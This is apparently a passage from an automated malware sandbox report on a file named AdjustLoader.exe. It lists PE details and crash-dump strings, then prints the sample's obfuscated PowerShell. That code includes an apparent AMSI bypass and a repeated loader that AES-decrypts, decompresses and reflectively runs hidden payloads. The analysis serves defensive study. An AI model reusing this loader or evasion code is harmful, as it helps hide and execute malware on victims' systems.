Source: AdjustLoader.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: AdjustLoader.exe Static file information: File size 25672704 > 1048576
Source: AdjustLoader.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc3da00
Source: AdjustLoader.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc3da00
Source: AdjustLoader.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdbp source: WER8844.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: C:\Users\admin\source\repos\Uni2\Uni2\obj\x64\Release\Uni2.pdb source: AdjustLoader.exe
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb4 source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.Install.pdb` source: WER8844.tmp.dmp.11.dr
Source: Binary string: System.Configuration.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.DirectoryServices.pdbh source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Configuration.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbjS source: WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Xml.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.CSharp.pdb%N source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Data.pdbH source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr
Source: Binary string: mscorlib.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: mscorlib.pdbPYW source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Management.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Configuration.pdbH source: WER4655.tmp.dmp.45.dr
Source: Binary string: System.Core.pdbiy source: WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.ni.pdb source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER4655.tmp.dmp.45.dr, WER8844.tmp.dmp.11.dr, WER1E1C.tmp.dmp.37.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($NIFilsXpyGNtBG,$LwazNVXndbOnNGQThDI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$kmefLeFZtUxOoKQt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[R
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](110)+''+'y'+''+[Char](97)+''+'
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TnoNKHHDUXvA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wrAnTRmMMLZATy,[Parameter(Position=1)][Type]$iejhPFpNZp)$FisCHMOcbia=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+'e'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+'e',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+''+'n'+'s'+[Char](105)+'C'+'l'+''+[Char](97)+''+'s'+'s,'+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$FisCHMOcbia.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$FisCHMOcbia.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+'a'+''+[Char](108)+'',$iejhPFpNZp,$wrAnTRmMMLZATy).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $FisCHMOcbia.CreateType();}$beUOypwDoUbYD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+'cro'+[Char](115)+''+'o'+'f'+'t'+'.'+'W'+''+[Char](105)+'n32'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+'t'+''+'h'+'o'+[Char](100)
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Users\user\AppData\Local\Temp\tmp6432.tmp.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX '$wgnFA=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$jLLdq);'.Replace('*', ''); IEX '$rUGem=$wgnFA.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$rUGem.*I*n*v*o*k*e*($null, $mXFYk);'.Replace('*', '');}$XpYqP = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $XpYqP;$wCepT=[System.IO.File]::ReadAllText($XpYqP).Split([Environment]::NewLine);foreach ($CrLwk in $wCepT) { if ($CrLwk.StartsWith(':: ')) { $BaEdL=$CrLwk.Substring(3); break; }}$USpSf=[string[]]$BaEdL.Split('\');IEX '$qjsDB=pEnJN (OEJrN ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($USpSf[0])));'.Replace('*', '');IEX '$KucUO=pEnJN (OEJrN ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($USpSf[1])));'.Replace('*', '');GDwhu $qjsDB $null;GDwhu $KucUO (,[string[]] ('')); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\system32\cmd.exe /S /D /c" echo function OEJrN($jLLdq){ $SFHve=[System.Security.Cryptography.Aes]::Create(); $SFHve.Mode=[System.Security.Cryptography.CipherMode]::CBC; $SFHve.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $SFHve.Key=[System.Convert]::FromBase64String('u7zgopjl7iMCblDGwt+nL93+9Q1OwLPv32X7otLLcsU='); $SFHve.IV=[System.Convert]::FromBase64String('YnJt8rKkmfjICvof8Wpokg=='); $eafkF=$SFHve.CreateDecryptor(); $lkiIH=$eafkF.TransformFinalBlock($jLLdq, 0, $jLLdq.Length); $eafkF.Dispose(); $SFHve.Dispose(); $lkiIH;}function pEnJN($jLLdq){ IEX '$klrVG=New-Object System.IO.M*em*or*yS*tr*ea*m(,$jLLdq);'.Replace('*', ''); IEX '$llRlz=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$jRWIB=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($klrVG, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $jRWIB.CopyTo($llRlz); $jRWIB.Dispose(); $klrVG.Dispose(); $llRlz.Dispose(); $llRlz.ToArray();}function GDwhu($jLLdq,$mXFYk){ IEX 